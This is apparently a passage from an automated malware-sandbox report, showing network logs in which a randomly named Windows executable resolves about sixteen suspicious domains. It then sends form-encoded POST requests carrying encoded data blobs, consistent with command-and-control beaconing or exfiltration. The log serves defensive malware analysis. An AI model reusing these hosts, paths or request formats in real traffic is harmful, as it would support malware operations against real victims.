                                                          Jul 3, 2024 16:00:05.785561085 CEST4978980192.168.2.43.33.130.190
                                                          Jul 3, 2024 16:00:05.790371895 CEST80497893.33.130.190192.168.2.4

                                                          UDP Packets

                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Jul 3, 2024 15:56:43.605340958 CEST6410753192.168.2.41.1.1.1
                                                          Jul 3, 2024 15:56:44.045557022 CEST53641071.1.1.1192.168.2.4
                                                          Jul 3, 2024 15:56:59.999666929 CEST6021253192.168.2.41.1.1.1
                                                          Jul 3, 2024 15:57:00.183504105 CEST53602121.1.1.1192.168.2.4
                                                          Jul 3, 2024 15:57:13.529422998 CEST5113853192.168.2.41.1.1.1
                                                          Jul 3, 2024 15:57:13.899224997 CEST53511381.1.1.1192.168.2.4
                                                          Jul 3, 2024 15:57:27.170097113 CEST5260153192.168.2.41.1.1.1
                                                          Jul 3, 2024 15:57:27.381876945 CEST53526011.1.1.1192.168.2.4
                                                          Jul 3, 2024 15:57:41.640121937 CEST6302753192.168.2.41.1.1.1
                                                          Jul 3, 2024 15:57:41.690493107 CEST53630271.1.1.1192.168.2.4
                                                          Jul 3, 2024 15:57:56.171031952 CEST5647953192.168.2.41.1.1.1
                                                          Jul 3, 2024 15:57:56.187910080 CEST53564791.1.1.1192.168.2.4
                                                          Jul 3, 2024 15:58:09.747944117 CEST5508753192.168.2.41.1.1.1
                                                          Jul 3, 2024 15:58:09.947638035 CEST53550871.1.1.1192.168.2.4
                                                          Jul 3, 2024 15:58:23.108542919 CEST6056853192.168.2.41.1.1.1
                                                          Jul 3, 2024 15:58:23.506375074 CEST53605681.1.1.1192.168.2.4
                                                          Jul 3, 2024 15:58:37.163914919 CEST5408553192.168.2.41.1.1.1
                                                          Jul 3, 2024 15:58:37.174453974 CEST53540851.1.1.1192.168.2.4
                                                          Jul 3, 2024 15:58:45.232752085 CEST4947753192.168.2.41.1.1.1
                                                          Jul 3, 2024 15:58:45.284346104 CEST53494771.1.1.1192.168.2.4
                                                          Jul 3, 2024 15:58:58.529818058 CEST5932853192.168.2.41.1.1.1
                                                          Jul 3, 2024 15:58:58.552629948 CEST53593281.1.1.1192.168.2.4
                                                          Jul 3, 2024 15:59:11.813896894 CEST6418553192.168.2.41.1.1.1
                                                          Jul 3, 2024 15:59:11.876440048 CEST53641851.1.1.1192.168.2.4
                                                          Jul 3, 2024 15:59:25.172182083 CEST5704753192.168.2.41.1.1.1
                                                          Jul 3, 2024 15:59:25.496218920 CEST53570471.1.1.1192.168.2.4
                                                          Jul 3, 2024 15:59:43.854212999 CEST6002053192.168.2.41.1.1.1
                                                          Jul 3, 2024 15:59:44.343368053 CEST53600201.1.1.1192.168.2.4
                                                          Jul 3, 2024 15:59:57.563951015 CEST5099653192.168.2.41.1.1.1
                                                          Jul 3, 2024 15:59:57.702621937 CEST53509961.1.1.1192.168.2.4
                                                          Jul 3, 2024 16:00:10.795758963 CEST6460953192.168.2.41.1.1.1
                                                          Jul 3, 2024 16:00:11.006990910 CEST53646091.1.1.1192.168.2.4

                                                          DNS Queries

                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                          Jul 3, 2024 15:56:43.605340958 CEST192.168.2.41.1.1.10x7fdeStandard query (0)www.immedu.websiteA (IP address)IN (0x0001)false
                                                          Jul 3, 2024 15:56:59.999666929 CEST192.168.2.41.1.1.10xf5bdStandard query (0)www.eoghenluire.comA (IP address)IN (0x0001)false
                                                          Jul 3, 2024 15:57:13.529422998 CEST192.168.2.41.1.1.10xf63Standard query (0)www.ajjmamlllqqq.xyzA (IP address)IN (0x0001)false
                                                          Jul 3, 2024 15:57:27.170097113 CEST192.168.2.41.1.1.10x2eb7Standard query (0)www.114lala.netA (IP address)IN (0x0001)false
                                                          Jul 3, 2024 15:57:41.640121937 CEST192.168.2.41.1.1.10x5479Standard query (0)www.shabygreen.topA (IP address)IN (0x0001)false
                                                          Jul 3, 2024 15:57:56.171031952 CEST192.168.2.41.1.1.10x5a14Standard query (0)www.077551.xyzA (IP address)IN (0x0001)false
                                                          Jul 3, 2024 15:58:09.747944117 CEST192.168.2.41.1.1.10xf2feStandard query (0)www.costmoon.comA (IP address)IN (0x0001)false
                                                          Jul 3, 2024 15:58:23.108542919 CEST192.168.2.41.1.1.10x997Standard query (0)www.w25dn.topA (IP address)IN (0x0001)false
                                                          Jul 3, 2024 15:58:37.163914919 CEST192.168.2.41.1.1.10xa5c7Standard query (0)www.indotop77.artA (IP address)IN (0x0001)false
                                                          Jul 3, 2024 15:58:45.232752085 CEST192.168.2.41.1.1.10x5d79Standard query (0)www.n-ambu.comA (IP address)IN (0x0001)false
                                                          Jul 3, 2024 15:58:58.529818058 CEST192.168.2.41.1.1.10x33b9Standard query (0)www.qrdinamicos.comA (IP address)IN (0x0001)false
                                                          Jul 3, 2024 15:59:11.813896894 CEST192.168.2.41.1.1.10xf429Standard query (0)www.g2m-os.comA (IP address)IN (0x0001)false
                                                          Jul 3, 2024 15:59:25.172182083 CEST192.168.2.41.1.1.10xf31fStandard query (0)www.vendasnaweb1.comA (IP address)IN (0x0001)false
                                                          Jul 3, 2024 15:59:43.854212999 CEST192.168.2.41.1.1.10x96f6Standard query (0)www.dudapolicarpo.onlineA (IP address)IN (0x0001)false
                                                          Jul 3, 2024 15:59:57.563951015 CEST192.168.2.41.1.1.10xf4d8Standard query (0)www.rodotest2.proA (IP address)IN (0x0001)false
                                                          Jul 3, 2024 16:00:10.795758963 CEST192.168.2.41.1.1.10x9a45Standard query (0)www.voupeclients.comA (IP address)IN (0x0001)false

                                                          DNS Answers

                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                          Jul 3, 2024 15:56:44.045557022 CEST1.1.1.1192.168.2.40x7fdeNo error (0)www.immedu.website185.106.178.60A (IP address)IN (0x0001)false
                                                          Jul 3, 2024 15:57:00.183504105 CEST1.1.1.1192.168.2.40xf5bdNo error (0)www.eoghenluire.comeoghenluire.comCNAME (Canonical name)IN (0x0001)false
                                                          Jul 3, 2024 15:57:00.183504105 CEST1.1.1.1192.168.2.40xf5bdNo error (0)eoghenluire.com76.223.105.230A (IP address)IN (0x0001)false
                                                          Jul 3, 2024 15:57:00.183504105 CEST1.1.1.1192.168.2.40xf5bdNo error (0)eoghenluire.com13.248.243.5A (IP address)IN (0x0001)false
                                                          Jul 3, 2024 15:57:13.899224997 CEST1.1.1.1192.168.2.40xf63No error (0)www.ajjmamlllqqq.xyz35.244.172.47A (IP address)IN (0x0001)false
                                                          Jul 3, 2024 15:57:27.381876945 CEST1.1.1.1192.168.2.40x2eb7No error (0)www.114lala.net154.23.7.170A (IP address)IN (0x0001)false
                                                          Jul 3, 2024 15:57:41.690493107 CEST1.1.1.1192.168.2.40x5479No error (0)www.shabygreen.top203.161.41.205A (IP address)IN (0x0001)false
                                                          Jul 3, 2024 15:57:56.187910080 CEST1.1.1.1192.168.2.40x5a14No error (0)www.077551.xyz104.21.84.69A (IP address)IN (0x0001)false
                                                          Jul 3, 2024 15:57:56.187910080 CEST1.1.1.1192.168.2.40x5a14No error (0)www.077551.xyz172.67.187.202A (IP address)IN (0x0001)false
                                                          Jul 3, 2024 15:58:09.947638035 CEST1.1.1.1192.168.2.40xf2feNo error (0)www.costmoon.com74.208.236.38A (IP address)IN (0x0001)false
                                                          Jul 3, 2024 15:58:23.506375074 CEST1.1.1.1192.168.2.40x997No error (0)www.w25dn.topw25dn.topCNAME (Canonical name)IN (0x0001)false
                                                          Jul 3, 2024 15:58:23.506375074 CEST1.1.1.1192.168.2.40x997No error (0)w25dn.top38.47.232.185A (IP address)IN (0x0001)false
                                                          Jul 3, 2024 15:58:37.174453974 CEST1.1.1.1192.168.2.40xa5c7Name error (3)www.indotop77.artnonenoneA (IP address)IN (0x0001)false
                                                          Jul 3, 2024 15:58:45.284346104 CEST1.1.1.1192.168.2.40x5d79No error (0)www.n-ambu.com46.30.211.38A (IP address)IN (0x0001)false
                                                          Jul 3, 2024 15:58:58.552629948 CEST1.1.1.1192.168.2.40x33b9No error (0)www.qrdinamicos.com217.160.0.119A (IP address)IN (0x0001)false
                                                          Jul 3, 2024 15:59:11.876440048 CEST1.1.1.1192.168.2.40xf429No error (0)www.g2m-os.comg2m-os.comCNAME (Canonical name)IN (0x0001)false
                                                          Jul 3, 2024 15:59:11.876440048 CEST1.1.1.1192.168.2.40xf429No error (0)g2m-os.com3.33.130.190A (IP address)IN (0x0001)false
                                                          Jul 3, 2024 15:59:11.876440048 CEST1.1.1.1192.168.2.40xf429No error (0)g2m-os.com15.197.148.33A (IP address)IN (0x0001)false
                                                          Jul 3, 2024 15:59:25.496218920 CEST1.1.1.1192.168.2.40xf31fNo error (0)www.vendasnaweb1.comvendasnaweb1.comCNAME (Canonical name)IN (0x0001)false
                                                          Jul 3, 2024 15:59:25.496218920 CEST1.1.1.1192.168.2.40xf31fNo error (0)vendasnaweb1.com162.241.2.92A (IP address)IN (0x0001)false
                                                          Jul 3, 2024 15:59:44.343368053 CEST1.1.1.1192.168.2.40x96f6No error (0)www.dudapolicarpo.onlinedudapolicarpo.onlineCNAME (Canonical name)IN (0x0001)false
                                                          Jul 3, 2024 15:59:44.343368053 CEST1.1.1.1192.168.2.40x96f6No error (0)dudapolicarpo.online162.240.81.18A (IP address)IN (0x0001)false
                                                          Jul 3, 2024 15:59:57.702621937 CEST1.1.1.1192.168.2.40xf4d8No error (0)www.rodotest2.prorodotest2.proCNAME (Canonical name)IN (0x0001)false
                                                          Jul 3, 2024 15:59:57.702621937 CEST1.1.1.1192.168.2.40xf4d8No error (0)rodotest2.pro3.33.130.190A (IP address)IN (0x0001)false
                                                          Jul 3, 2024 15:59:57.702621937 CEST1.1.1.1192.168.2.40xf4d8No error (0)rodotest2.pro15.197.148.33A (IP address)IN (0x0001)false
                                                          Jul 3, 2024 16:00:11.006990910 CEST1.1.1.1192.168.2.40x9a45No error (0)www.voupeclients.compixie.porkbun.comCNAME (Canonical name)IN (0x0001)false
                                                          Jul 3, 2024 16:00:11.006990910 CEST1.1.1.1192.168.2.40x9a45No error (0)pixie.porkbun.com44.227.65.245A (IP address)IN (0x0001)false
                                                          Jul 3, 2024 16:00:11.006990910 CEST1.1.1.1192.168.2.40x9a45No error (0)pixie.porkbun.com44.227.76.166A (IP address)IN (0x0001)false

                                                          HTTP Request Dependency Graph

                                                          • www.immedu.website
                                                          • www.eoghenluire.com
                                                          • www.ajjmamlllqqq.xyz
                                                          • www.114lala.net
                                                          • www.shabygreen.top
                                                          • www.077551.xyz
                                                          • www.costmoon.com
                                                          • www.w25dn.top
                                                          • www.n-ambu.com
                                                          • www.qrdinamicos.com
                                                          • www.g2m-os.com
                                                          • www.vendasnaweb1.com
                                                          • www.dudapolicarpo.online
                                                          • www.rodotest2.pro

                                                          HTTP Packets

                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          0192.168.2.449736185.106.178.60801908C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 3, 2024 15:56:44.059632063 CEST463OUTGET /p5xb/?TvpPfhGp=gZSYabCnKqSr1J4TudILkU7OUr6zW8quS0K3SSEWSlTvQpNCKBnGards6ZD8X7yXO9b/F0Vh3EPZ273HAe14Zo8L5xIdhoBu33QGrF37ZE8rNfV+CMbs4i4=&Y664G=SttDen986 HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Connection: close
                                                          Host: www.immedu.website
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Mercury/8.7 Mobile/11B554a Safari/9537.53
                                                          Jul 3, 2024 15:56:44.945144892 CEST510INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Wed, 03 Jul 2024 13:56:44 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Vary: Accept-Encoding
                                                          Data Raw: 31 33 64 0d 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 2e 31 3b 20 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 66 33 38 35 78 77 2e 63 6f 6d 2f 72 65 67 69 73 74 65 72 22 20 2f 3e 20 20 20 20 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 6a 73 2e 75 73 65 72 73 2e 35 31 2e 6c 61 2f 32 31 38 37 39 31 31 33 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 6a 71 75 65 72 79 73 63 64 6e 73 2e 6e 65 74 2f 6a 71 75 65 72 79 2d 33 2e 37 2e 31 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 13d<html><head> <meta charset="utf-8"><meta http-equiv="refresh" content="0.1; url=https://f385xw.com/register" /> <script type="text/javascript" src="https://js.users.51.la/21879113.js"></script></body><script type="text/javascript" src="https://cdn.jqueryscdns.net/jquery-3.7.1.min.js"></script></html>0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          1192.168.2.44973876.223.105.230801908C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 3, 2024 15:57:00.193569899 CEST735OUTPOST /i3r0/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Content-Length: 205
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Cache-Control: max-age=0
                                                          Connection: close
                                                          Host: www.eoghenluire.com
                                                          Origin: http://www.eoghenluire.com
                                                          Referer: http://www.eoghenluire.com/i3r0/
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Mercury/8.7 Mobile/11B554a Safari/9537.53
                                                          Data Raw: 54 76 70 50 66 68 47 70 3d 37 79 59 74 63 43 6d 45 33 5a 6e 50 54 6f 72 65 75 77 35 6e 35 36 69 73 57 6e 78 46 2b 6f 56 69 32 36 6a 59 6e 53 69 2b 69 2b 31 36 78 4e 4a 74 72 4b 69 74 4d 4e 30 6b 52 36 38 51 73 6d 4d 77 70 48 57 49 52 49 75 54 69 53 33 2b 65 55 4d 42 66 6e 5a 56 63 62 52 55 4c 59 41 4b 42 59 77 6e 6d 2f 44 4d 31 55 43 4c 46 36 70 44 38 63 70 78 48 4c 34 4c 2f 2b 6f 4f 69 73 77 6b 51 43 5a 32 32 71 62 43 52 4b 65 49 64 53 70 79 42 75 53 61 53 65 7a 42 50 43 70 4f 2f 46 4a 50 6b 46 31 31 52 67 74 51 54 48 58 2f 30 6d 2f 63 77 30 2b 6f 75 67 39 69 75 63 30 6b 71 56 4b 6c 31 76 77 6d 2b 77 3d 3d
                                                          Data Ascii: TvpPfhGp=7yYtcCmE3ZnPToreuw5n56isWnxF+oVi26jYnSi+i+16xNJtrKitMN0kR68QsmMwpHWIRIuTiS3+eUMBfnZVcbRULYAKBYwnm/DM1UCLF6pD8cpxHL4L/+oOiswkQCZ22qbCRKeIdSpyBuSaSezBPCpO/FJPkF11RgtQTHX/0m/cw0+oug9iuc0kqVKl1vwm+w==
                                                          Jul 3, 2024 15:57:00.665910006 CEST1236INHTTP/1.1 404 Not Found
                                                          content-type: text/html;charset=utf-8
                                                          content-length: 964
                                                          vary: Accept-Encoding
                                                          server: DPS/2.0.0+sha-aaf97e5
                                                          x-version: aaf97e5
                                                          x-siteid: us-east-1
                                                          set-cookie: dps_site_id=us-east-1; path=/
                                                          date: Wed, 03 Jul 2024 13:57:00 GMT
                                                          keep-alive: timeout=5
                                                          connection: close
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 69 6d 67 31 2e 77 73 69 6d 67 2e 63 6f 6d 2f 64 70 73 2f 63 73 73 2f 75 78 63 6f 72 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 69 6d 67 31 2e 77 73 69 6d 67 2e 63 6f 6d 2f 64 70 73 2f 63 73 73 2f 63 75 73 74 6f 6d 65 72 2d 63 6f 6d 70 2e 63 73 [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE html><html><head> <title>404 Not Found</title> <meta http-equiv="content-type" content="text/html; charset=utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <link href="//img1.wsimg.com/dps/css/uxcore.css" rel="stylesheet"> <link href="//img1.wsimg.com/dps/css/customer-comp.css" rel="stylesheet"></head><body><div id="error-img"><img src="//img1.wsimg.com/dps/images/404_background.jpg"></div><div class="container text-center" id="error"> <div class="row"> <div class="col-md-12"> <div class="main-icon text-warning"><span class="uxicon uxicon-alert"></span></div> <h1>File not found (404 error)</h1> </div> </div> <div class="row"> <div class="col-md-6 col-md-push-3"> <p class="lead">If you think what you're looking for should be here, please contact the site owner.</p> </div>
                                                          Jul 3, 2024 15:57:00.665935993 CEST31INData Raw: 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: </div></div></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          2192.168.2.44973976.223.105.230801908C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 3, 2024 15:57:02.753685951 CEST755OUTPOST /i3r0/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Content-Length: 225
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Cache-Control: max-age=0
                                                          Connection: close
                                                          Host: www.eoghenluire.com
                                                          Origin: http://www.eoghenluire.com
                                                          Referer: http://www.eoghenluire.com/i3r0/
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Mercury/8.7 Mobile/11B554a Safari/9537.53
                                                          Data Raw: 54 76 70 50 66 68 47 70 3d 37 79 59 74 63 43 6d 45 33 5a 6e 50 53 49 37 65 39 52 35 6e 37 61 69 74 5a 48 78 46 30 49 56 75 32 36 6e 59 6e 54 6d 75 69 4d 52 36 30 66 52 74 36 2b 32 74 4a 4e 30 6b 62 61 38 52 79 57 4e 38 70 48 4b 32 52 4e 57 54 69 53 7a 2b 65 52 49 42 65 57 5a 61 64 4c 52 61 44 34 42 4d 50 34 77 6e 6d 2f 44 4d 31 55 48 67 46 36 78 44 2f 6f 74 78 48 71 34 49 38 2b 6f 4e 31 63 77 6b 62 69 5a 36 32 71 62 67 52 50 37 64 64 51 52 79 42 71 61 61 54 4d 62 41 46 43 70 49 77 6c 49 67 33 56 67 6c 65 46 67 4e 57 31 53 64 70 6e 58 4e 31 79 76 79 2f 52 63 31 38 63 51 58 33 53 44 52 34 73 4e 76 6c 7a 6f 4e 45 73 33 62 6d 47 49 36 2f 75 32 69 53 39 54 51 33 58 59 3d
                                                          Data Ascii: TvpPfhGp=7yYtcCmE3ZnPSI7e9R5n7aitZHxF0IVu26nYnTmuiMR60fRt6+2tJN0kba8RyWN8pHK2RNWTiSz+eRIBeWZadLRaD4BMP4wnm/DM1UHgF6xD/otxHq4I8+oN1cwkbiZ62qbgRP7ddQRyBqaaTMbAFCpIwlIg3VgleFgNW1SdpnXN1yvy/Rc18cQX3SDR4sNvlzoNEs3bmGI6/u2iS9TQ3XY=
                                                          Jul 3, 2024 15:57:03.250248909 CEST1236INHTTP/1.1 404 Not Found
                                                          content-type: text/html;charset=utf-8
                                                          content-length: 964
                                                          vary: Accept-Encoding
                                                          server: DPS/2.0.0+sha-aaf97e5
                                                          x-version: aaf97e5
                                                          x-siteid: us-east-1
                                                          set-cookie: dps_site_id=us-east-1; path=/
                                                          date: Wed, 03 Jul 2024 13:57:03 GMT
                                                          keep-alive: timeout=5
                                                          connection: close
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 69 6d 67 31 2e 77 73 69 6d 67 2e 63 6f 6d 2f 64 70 73 2f 63 73 73 2f 75 78 63 6f 72 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 69 6d 67 31 2e 77 73 69 6d 67 2e 63 6f 6d 2f 64 70 73 2f 63 73 73 2f 63 75 73 74 6f 6d 65 72 2d 63 6f 6d 70 2e 63 73 [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE html><html><head> <title>404 Not Found</title> <meta http-equiv="content-type" content="text/html; charset=utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <link href="//img1.wsimg.com/dps/css/uxcore.css" rel="stylesheet"> <link href="//img1.wsimg.com/dps/css/customer-comp.css" rel="stylesheet"></head><body><div id="error-img"><img src="//img1.wsimg.com/dps/images/404_background.jpg"></div><div class="container text-center" id="error"> <div class="row"> <div class="col-md-12"> <div class="main-icon text-warning"><span class="uxicon uxicon-alert"></span></div> <h1>File not found (404 error)</h1> </div> </div> <div class="row"> <div class="col-md-6 col-md-push-3"> <p class="lead">If you think what you're looking for should be here, please contact the site owner.</p> </div>
                                                          Jul 3, 2024 15:57:03.250319004 CEST31INData Raw: 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: </div></div></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          3192.168.2.44974076.223.105.230801908C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 3, 2024 15:57:05.286130905 CEST10837OUTPOST /i3r0/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Content-Length: 10305
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Cache-Control: max-age=0
                                                          Connection: close
                                                          Host: www.eoghenluire.com
                                                          Origin: http://www.eoghenluire.com
                                                          Referer: http://www.eoghenluire.com/i3r0/
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Mercury/8.7 Mobile/11B554a Safari/9537.53
                                                          Data Raw: 54 76 70 50 66 68 47 70 3d 37 79 59 74 63 43 6d 45 33 5a 6e 50 53 49 37 65 39 52 35 6e 37 61 69 74 5a 48 78 46 30 49 56 75 32 36 6e 59 6e 54 6d 75 69 4d 5a 36 30 4d 5a 74 72 70 4b 74 4b 4e 30 6b 59 61 38 4d 79 57 4d 6d 70 48 53 71 52 4e 4b 44 69 51 37 2b 45 7a 41 42 57 46 42 61 54 4c 52 61 50 59 42 63 42 59 78 74 6d 2f 54 41 31 55 33 67 46 36 78 44 2f 70 64 78 42 37 34 49 36 2b 6f 4f 69 73 77 6f 51 43 5a 57 32 70 72 61 52 4f 37 4e 64 41 78 79 42 4c 6d 61 51 34 37 41 47 69 70 4b 7a 6c 49 34 33 56 39 2f 65 46 55 42 57 30 33 77 70 6b 4c 4e 30 55 2b 70 73 52 51 6c 2b 64 49 4a 30 6a 44 6e 38 63 51 6f 6f 77 31 7a 4b 66 7a 48 38 56 30 46 2f 75 47 72 48 64 37 6b 73 58 72 6c 47 56 65 61 71 6d 30 69 44 36 53 37 48 31 53 4e 38 52 59 71 6f 6b 51 33 4f 39 41 75 54 30 35 6a 4f 38 6e 7a 74 79 51 4c 54 37 50 32 46 42 51 30 65 50 58 35 36 67 77 6e 2b 46 49 4f 36 4a 41 44 79 56 79 50 44 48 47 73 4f 79 4c 62 79 6e 6b 4c 78 7a 68 6e 76 53 45 34 36 42 64 2f 4a 52 69 46 33 4b 2f 49 57 57 73 49 32 4b 55 33 6e 4c 76 44 64 [TRUNCATED]
                                                          Data Ascii: TvpPfhGp=7yYtcCmE3ZnPSI7e9R5n7aitZHxF0IVu26nYnTmuiMZ60MZtrpKtKN0kYa8MyWMmpHSqRNKDiQ7+EzABWFBaTLRaPYBcBYxtm/TA1U3gF6xD/pdxB74I6+oOiswoQCZW2praRO7NdAxyBLmaQ47AGipKzlI43V9/eFUBW03wpkLN0U+psRQl+dIJ0jDn8cQoow1zKfzH8V0F/uGrHd7ksXrlGVeaqm0iD6S7H1SN8RYqokQ3O9AuT05jO8nztyQLT7P2FBQ0ePX56gwn+FIO6JADyVyPDHGsOyLbynkLxzhnvSE46Bd/JRiF3K/IWWsI2KU3nLvDdVyfyzhuMkbqAh3qWxxbaAEa0I91x8ynSdXBm/MZuflLlcbblpUYOH+KQZSYt/JQUn1J1gpKPQmc2Mp2M85QxCOmXkLZX2vGp1K67zbz3kw7zUrMkctuTlWgMK15pTQsfkwwm5JGDx1ma7qnQ9JLyVj0PM6vvGuyKwsQ/3dC5WA2fpyti83hfmdsJsu5NmP51bGw0dFh6wIk8gUJ7SI4oWsq5aQYTd0pWItYWnqdQuosbdlRGFUXhQ5xPIHBQt5jeKL1WMQ/Mgh8FG2D1ALtRCwaTKtrrIjONk1my5qaP91Qwzc1iojMRg31mkoUfhiuelbKbIpi7fERxiM3py5DodOx/Bb9RHJXZpzHiuLALho8dfnHxN7Kj7F4rm6TRvW2oqLf3sVftMWCJlpL7imtdOfIWTfoVhRwk/eXJ5RVriJOIUuFyCzV9mwEK0iQETMetb6HYaxiY1ly2Dt4Zb0oMMMvX8cqFyYpm2WFVSMhRP8lc+JsNO1XkAnt/t3lvC68lHG7L9Mc87tAihM4fkPyV6UExL2GEuoXqhUe+TwOy3nbOIDCtehvl3AGchm2Etdtom5p89dRaJsUAJ0xdB/7j3GVQROiRJ4pilF7bS7iyoYheKNocbdFErbz4yN2sJZGnDa2E067OISeGJvjsBqPaZtmXaOXi8fYqTY [TRUNCATED]
